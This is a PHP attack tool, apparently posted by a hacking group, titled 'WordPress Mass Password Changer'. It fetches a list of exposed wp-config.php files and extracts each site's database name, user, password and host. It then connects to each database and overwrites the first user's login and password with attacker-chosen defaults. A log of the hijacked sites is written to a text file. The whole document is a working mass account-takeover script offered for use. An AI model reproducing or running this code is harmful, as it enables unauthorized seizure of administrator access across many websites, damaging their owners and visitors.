Wo mass ped

1. <?php
2. /**
3. * @author: FaisaL Ahmed aka rEd X
4. * @mail: me@faialahmed.me
5. * @Last Updated: 14 June 2015
6. */
7.  
8. set_time_limit(0);
9. ini_set('display_errors', 0);
10.  
11. echo '<html><head>
12. <title>WordPress Mass Password Changer | 3xp1r3 Cyber Army</title>
13. <meta content="text/html; charset=utf-8">
14. <meta name="keywords" content="WordPress Password Changer, 3xp1r3, 3xp1r3 Cyber Army, rEd X" />
15. <meta name="description" content="WordPress Mass Password Changer" />
16. <meta name="author" content="rEd X" />
17. <link rel="SHORTCUT ICON" href="http://us.yimg.com/i/mesg/emoticons7/61.gif">
18. <link href="http://fonts.googleapis.com/css?family=Iceland" rel="stylesheet" type="text/css">
19. <link rel="stylesheet" type="text/css" href="http://faisalahmed.me/wp-content/assets/css/1.css">
20. </head><body>';
21.  
22. echo '<div style="font-family: Iceland;font-size: 35pt;text-shadow: 0 0 6px #FF0000, 0 0 5px #FF0000, 0 0 5px #FF0000;color: #FFF">WordPress Mass Password Changer<br />_{3xp1r3 Cyber Army}</div><br/>';
23.  
24. echo '<form method="POST" action="" ><center><table border="1"><tr><td>Config List:</td>
25. <td><textarea name="url" cols="50" rows="10" ></textarea></td></tr>
26. <tr><td>User/Password</td><td><input type="text" name="username" size="25" value="3ca"> / <input type="text" name="password" size="25" value="3xp1r3"></td></tr></table>
27. <br><input type="Submit" class="button" value="Submit"><input type="hidden" name="action" value="1"></form></center>';
28.  
29. if ($_POST['action']=='1'){
30. if ($_POST['url']==''){
31. echo "<div class='result'>No CONFIG FOUND<br>Make sure you provided a config list!</div><br>";
32. }else{
33. $url=$_POST['url'];
34. $users = explode("\n",$url);
35. foreach ($users as $user) {
36. $user1=trim($user);
37. $code=file_get_contents2($user1);
38. preg_match_all('|define.*\(.*\'DB_NAME\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b1);
39. $db=$b1[1][0];
40. preg_match_all('|define.*\(.*\'DB_USER\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b2);
41. $user=$b2[1][0];
42. preg_match_all('|define.*\(.*\'DB_PASSWORD\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b3);
43. $db_password=$b3[1][0];
44. preg_match_all('|define.*\(.*\'DB_HOST\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b4);
45. $host=$b4[1][0];
46. preg_match_all('|\$table_prefix.*=.*\'(.*)\'.*;|isU',$code,$b5);
47. $p=$b5[1][0];
48.  
49. $d=@mysql_connect( $host, $user, $db_password ) ;
50. if ($d){
51. @mysql_select_db($db );
52. $usern=$_POST['username'];
53. $passwd=$_POST['password'];
54. $sql = "UPDATE `".$p."users` SET `user_pass` = MD5( '".$passwd."' ) WHERE `ID` = '1';";
55. @mysql_query($sql) ; ;
56. $sql = "UPDATE `".$p."users` SET `user_login` = '".$usern."' WHERE `ID` = '1';";
57. @mysql_query($sql) ; ;
58. $aa=@mysql_query("select option_value from `".$p."options` WHERE `option_name` = 'siteurl';") ;;
59. $siteurl=@mysql_fetch_array($aa) ;
60. $siteurl=$siteurl['option_value'];
61. $tr.="$siteurl\n";
62. mysql_close();
63. }
64. }
65. if ($tr)
66. $filename = 'pchangedlist.txt';
67. $fp = fopen($filename, "a+");
68. $write = fputs($fp, $tr);
69. fclose($fp);
70. echo "<div class='result'>Password Changing Completed ! :)<br><br>";
71. echo "<a href='pchangedlist.txt' target='_blank'>View List of Password Changed Sites</a></div><br/>";
72. //echo "Index changed for <br><br><textarea cols='50' rows='10' >$tr</textarea>";
73. }
74. }
75.  
76. function file_get_contents2($u){
77. $ch = curl_init();
78. curl_setopt($ch,CURLOPT_URL,$u);
79. curl_setopt($ch, CURLOPT_HEADER, 0);
80. curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
81. curl_setopt($ch,CURLOPT_USERAGENT,"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0 ");
82. $result = curl_exec($ch);
83. return $result ;
84. }
85.  
86. echo "<br><br>&#169; rEd X | 3xp1r3 Cyber Army";
87. ?>
88. </html>